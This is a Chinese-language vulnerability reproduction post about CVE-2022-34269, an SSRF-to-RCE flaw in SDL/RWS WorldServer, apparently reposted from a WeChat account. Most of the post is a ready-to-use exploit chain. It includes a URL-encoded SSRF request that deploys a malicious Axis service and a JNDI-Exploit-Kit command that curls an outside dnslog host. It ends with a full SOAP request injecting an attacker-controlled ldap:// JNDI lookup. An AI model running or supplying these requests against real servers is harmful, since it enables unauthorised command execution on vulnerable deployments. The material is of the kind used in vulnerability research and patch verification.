本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
SDL WorldServer 翻译流程管理系统专为本地化项目经理及其团队而设计,用于集中管理、自动化和控制大量的翻译项目,以提供按时、按预算的高质量翻译交付。企业团队可在整个组织内重新获得翻译控制权,并可与多个外部翻译供应商(LSP)高效协作。目前支持许多全球知名品牌的翻译流程,成功简化并加快了其内容从网站到文档到软件的本地化流程。
开发语言:Java官网地址:https://www.rws.com/cn/
![[漏洞复现] CVE-2022-34269 SDL WroldServer SSRF](http://cn-sec.com/wp-content/uploads/2023/12/1-1703638727.png "[漏洞复现] CVE-2022-34269 SDL WroldServer SSRF")
空间测绘
回复“CVE-2022-34269”获取空间测绘语句漏洞描述
在 11.7.3 之前的 RWS WorldServer 中发现了一个问题。经过身份验证的远程攻击者可以执行 ws-legacy/load_dtd?system_id= 进行盲SSRF 攻击,将 JSP 代码部署到在 localhost 接口上运行的 Apache Axis 服务,从而导致命令执行。
影响版本
SDL WorldServer ≤ 11.7.2.243漏洞利用
1.创建新的服务
/ws-legacy/load_dtd?system_id=http%3a//127.0.0.1%3a8080/ws-legacy/services/AdminService%3fmethod%3d!--%253E%253Cdeployment%2520xmlns%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252F%2522%2520xmlns%253Ajava%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252Fproviders%252Fjava%2522%253E%253Cservice%2520name%253D%2522ServiceFactoryService%2522%2520provider%253D%2522java%253ARPC%2522%253E%253Cparameter%2520name%253D%2522className%2522%2520value%253D%2522org.apache.axis.client.ServiceFactory%2522%252F%253E%253Cparameter%2520name%253D%2522allowedMethods%2522%2520value%253D%2522*%2522%252F%253E%253C%252Fservice%253E%253C%252Fdeployment&token=022.启动LDAP服务
java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C 'curl 8e2wrm.dnslog.cn'3.在Burp中发送请求
POST /ws-legacy/services/UserWSUserManager HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5763.212 Safari/537.36 OPR/98.0.4728.119Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=A440950C0CE03EBC83A30F926F0FC3E3Connection: closeSOAPAction:Content-Type: text/xml;charset=UTF-8Content-Length: 856<soapenv:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:com="http://www.idiominc.org/com.idiominc.webservices.UserWSUserManager"><soapenv:Header/><soapenv:Body><cli:getServicesoapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><environmentxsi:type="x-:Map"xs:type="type:Map"xmlns:x-="http://xml.apache.org/xml-soap"xmlns:xs="http://www.w3.org/2001/XMLSchema-instance"><itemxsi:type="x-:mapItem"xs:type="type:mapItem"><keyxsi:type="xsd:string">jndiName</key><valuexsi:type="xsd:string">ldap://10.0.0.131:1389/ipgtz4</value></item></environment></cli></soapenv:Body></soapenv:Envelope>
参考链接
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34269https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2022-34269 SDL WroldServer SSRF
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论